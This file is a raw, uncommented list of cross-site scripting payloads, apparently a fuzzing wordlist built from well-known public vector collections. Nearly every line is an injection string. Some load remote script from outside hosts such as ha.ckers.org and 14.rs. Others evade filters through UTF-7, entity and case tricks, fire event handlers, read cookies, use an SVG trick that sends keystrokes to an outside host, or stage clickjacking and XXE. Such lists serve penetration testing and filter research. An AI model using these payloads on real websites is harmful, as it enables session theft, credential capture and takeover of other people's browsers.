<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS679')&lt;/SCRIPT&gt;">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS311');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCriPt x>(((confirm)))``</scRipt x>
<w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z
<deTAiLs/open/oNtoGGle=confirm()>
<scRiPt y="><">/*<sCRipt* */prompt()</script
<A href="javascript%26colon;confirm()">click
<sVg oNloaD=write()>
<A href=javas%26#99;ript:alert(204)>click
<sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)>
<svG/x=">"/oNloaD=confirm()//
<--`<iMG/srC=` onerror=confirm``> --!>
<SVg </onlOad ="1> (_=prompt,_(110)) "">
<!--><scRipT src=//14.rs>
<sCriPt/src=//14.rs?
<sCRIpt x=">" src=//15.rs></script>
<D3/OnMouSEenTer=[2].find(confirm)>z
<D3"<"/OncLick="1>[confirm``]"<">z
<D3/OnpOinTeReENter=confirm``>click here
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<Z oncut=alert()>x
<iFrAMe/src \/\/onload = prompt(396)
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
>>> vectors()
<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(375)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(481)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(136)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(897) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(959) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(394)';-o-link-source:current">X</a>//["'`-->]]>]</div><div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div><div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div><div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div><div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div><div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div><div id="15"><script>({0:#0=alert/#0#/#0#(484)})</script>//["'`-->]]>]</div><div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div><div id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div><div id="18"><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>//["'`-->]]>]</div><div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div><div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div><div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div><div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div><div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(718)>X</button>//["'`-->]]>]</div><div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//["'`-->]]>]</div><div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div><div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div><div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div>
<div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)  attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//["'`-->]]>]</div>
<div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div><div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div><div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div><div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div><div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(767)">XXX</a>//["'`-->]]>]</div><div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//["'`-->]]>]</div><div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div><div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div><div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div><div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div>
<div id="39"><!-- up to Opera 11.52, FF 3.6.28 -->
<![><img src="]><img src=x onerror=alert(39)//">
<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+  -->
<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(872)//"></svg>//["'`-->]]>]</div>
<div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div>
<div id="41"><li style=list-style:url() onerror=alert(41)></li>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//["'`-->]]>]</div>
<div id="42"><head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div>
<div id="43"><?xml version="1.0" standalone="no"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head>
<body>Hello</body>
</html>//["'`-->]]>]</div>
<div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div><div id="45"><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div><div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div><div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div><div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div><div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div><div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div><div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div><div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div>
<div id="53"><xml id="XSS529" src="test.htc"></xml>
<label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div>
<div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div>
<div id="61"><div  style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>//["'`-->]]>]</div>
<div id="62"><!-- IE 6-8 -->
<x '="foo"><x foo='><img src=x onerror=alert(62)//'>
<!-- IE 6-9 -->
<! '="foo"><x foo='><img src=x onerror=alert(437)//'>
<? '="foo"><x foo='><img src=x onerror=alert(618)//'>//["'`-->]]>]</div>
<div id="63"><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF
<img src="javascript:alert(938)">
<image src="javascript:alert(695)"> // IE6, O10.10↓, OM10.0↓
<script src="javascript:alert(432)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div>
<div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div>
<div id="66"><?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='XSS387'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>
<root/>//["'`-->]]>]</div>
<div id="67"><!DOCTYPE x [   <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"onerror CDATA "alert(67)"onload CDATA "alert(886)">]><img />//["'`-->]]>]</div>
<div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml">   <html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x></doc>//["'`-->]]>]</div>
<div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//["'`-->]]>]</div><div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div><div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div><div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div><div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div><div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div><div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div><div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div><div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div><div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div><div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div><div id="80"><style>*{x:ｅｘｐｒｅｓｓｉｏｎ(alert(80))}</style>//["'`-->]]>]</div><div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div><div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(781));%7d"?>//["'`-->]]>]</div>
<div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml"  x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template>//["'`-->]]>]</div>
<div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div><div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div><div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div>
<div id="87"><svg xmlns="http://www.w3.org/2000/svg">
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a>
</svg>//["'`-->]]>]</div>
<div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<animation xlink:href="javascript:alert(88)"/>
<animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/>
<image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/>
<foreignObject xlink:href="javascript:alert(88)"/>
<foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/>
</svg>//["'`-->]]>]</div>
<div id="89"><svg xmlns="http://www.w3.org/2000/svg">
<set attributeName="onmouseover" to="alert(89)"/>
<animate attributeName="onunload" to="alert(89)"/>
</svg>//["'`-->]]>]</div>
<div id="90"><!-- Up to Opera 10.63 -->
<div style=content:url(test2.svg)></div>
<!-- Up to Opera 11.64 - see link below -->
<!-- Up to Opera 12.x -->
<div style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div>
<div id="91">[A]
<? foo="><script>alert(91)</script>">
<! foo="><script>alert(91)</script>">
</ foo="><script>alert(91)</script>">
<? foo="><x foo='?><script>alert(91)</script>'>">
<! foo="[[[x]]"><x foo="]foo><script>alert(91)</script>">
<% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div>
<div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div>
<div id="94"><svg xmlns="http://www.w3.org/2000/svg">
<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler>
</svg>//["'`-->]]>]</div>
<div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage>
</svg>//["'`-->]]>]</div>
<div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`-->]]>]</div>
<div id="97"><!-- IE 5-9 -->
<div id=d><x xmlns="><iframe onload=alert(97)"></div>
<script>d.innerHTML+='';</script>
<!-- IE 10 in IE5-9 Standards mode -->
<div id=d><x xmlns='"><iframe onload=alert(359)//'></div>
<script>d.innerHTML+='';</script>//["'`-->]]>]</div>
<div id="98"><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div>
<script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div>
<div id="99">XXX<style>
*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
<!--
--><!--*{color:red}   /* all UA */
*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */
</style>//["'`-->]]>]</div>
<div id="100"><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div><div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div><div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div>
<div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo">
<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/>
</svg>//["'`-->]]>]</div>
<div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div>
<div id="108"><!-- IE 5-8 standards mode -->
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>">
<!-- IE 5-9 standards mode -->
<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(537)//">
<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(963)//">//["'`-->]]>]</div>
<div id="109"><svg xmlns="http://www.w3.org/2000/svg">
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
<rect  fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/>
</svg>//["'`-->]]>]</div>
<div id="110"><svg xmlns="http://www.w3.org/2000/svg">
<path d="M0,0" style="marker-start:url(test4.svg#a)"/>
</svg>//["'`-->]]>]</div>
<div id="111"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div>
<div id="113"><div id="x">XXX</div>
<style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>//["'`-->]]>]</div>
<div id="114"><x style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div>
<div id="115"><!--[if]><script>alert(115)</script -->
<!--[if<img src=x onerror=alert(156)//]> -->//["'`-->]]>]</div>
<div id="116"><div id="x">x</div>
<xml:namespace prefix="t">
<import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;">//["'`-->]]>]</div>
<div id="117"><a href="http://attacker.org">
<iframe src="http://example.org/"></iframe>
</a>//["'`-->]]>]</div>
<div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"><h1>Drop me</h1></div>
<iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div>
<div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>
<textarea type="text" cols="50" rows="10"></textarea>//["'`-->]]>]</div>
<div id="120"><script>function makePopups(){for (i=1;i<6;i++) {window.open('popup.html','spam'+i,'width=50,height=50');}}</script>
<body><a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div>
<div id="121"><html xmlns="http://www.w3.org/1999/xhtml"
xmlns:svg="http://www.w3.org/2000/svg">
<body style="background:gray">
<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/>
<svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"><svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/><svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body>
</html>//["'`-->]]>]</div>
<div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div>
<div id="123"><span class=foo>Some text</span>
<a class=bar href="http://www.example.org">www.example.org</a>
<script src="http://code.jquery.com/jquery-1.4.4.js"></script>
<script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert('bar');location="http://html5sec.org";});</script>//["'`-->]]>]</div>
<div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10
<script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div>
<div id="125"><?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet id    ID    #REQUIRED>]>
<svg xmlns="http://www.w3.org/2000/svg">
<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">        <xsl:template match="/"><iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe>        </xsl:template></xsl:stylesheet><circle fill="red" r="40"></circle></svg>//["'`-->]]>]</div>
<div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div>
<div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x">
<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
<handler id="y">alert(127)</handler>
</svg>//["'`-->]]>]</div>
<div id="128"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//["'`-->]]>]</div>
<div id="129"><svg>
<image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'>
</svg>//["'`-->]]>]</div>
<div id="130"><math href="javascript:alert(130)">CLICKME</math>
<math>
<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(443)">CLICKME</maction>
<maction actiontype="statusline" xlink:href="javascript:alert(222)">CLICKME<mtext>http://http://google.com</mtext></maction>
</math>//["'`-->]]>]</div>
<div id="131"><b>drag and drop one of the following strings to the drop box:</b>
<br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>
feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>
feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b>
<br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>
<div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div>
<div id="132"><!doctype html>
<form>
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
<br>
<input name="secret" type="password">
</form>
<!-- injection --><svg height="50px">
<image xmlns:xlink="http://www.w3.org/1999/xlink">
<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" />
<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" />
<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" />
</image>
</svg>//["'`-->]]>]</div>
<div id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div>
<div id="134"><xmp>
<%
</xmp>
<img alt='%></xmp><img src=xx:x onerror=aler
*{color:red}</style>//["'`-->]]>]</div>
<div id="135"><?xml-stylesheet type="text/xsl" href="#" ?>
<stylesheet xmlns="http://www.w3.org/TR/WD-xsl">
<template match="/">
<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval>
<if expr="new ActiveXObject('htmlfile').parentWindow.alert(967)"></if>
</template>
</stylesheet>//["'`-->]]>]</div>
<div id="136"><form action="" method="post">
<input name="username" value="admin" />
<input name="password" type="password" value="secret" />
<input name="injected" value="injected" dirname="password" />
<input type="submit">
</form>//["'`-->]]>]</div>
<div id="137"><svg>
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?">
<circle r="400"></circle>
<animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" />
</a>//["'`-->]]>]</div>
<div id="138"><link rel="import" href="test.svg" />//["'`-->]]>]</div><div id="139"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />//["'`-->]]>]</div>undefined
<marquee loop=1 width=0 onfinish=alert(126)>
<marguee/onstart=alert(700)>
<svg onload=(alert)(964)>
<script>$=1,alert($)</script>
<form><button formaction="javascript:alert(180)">
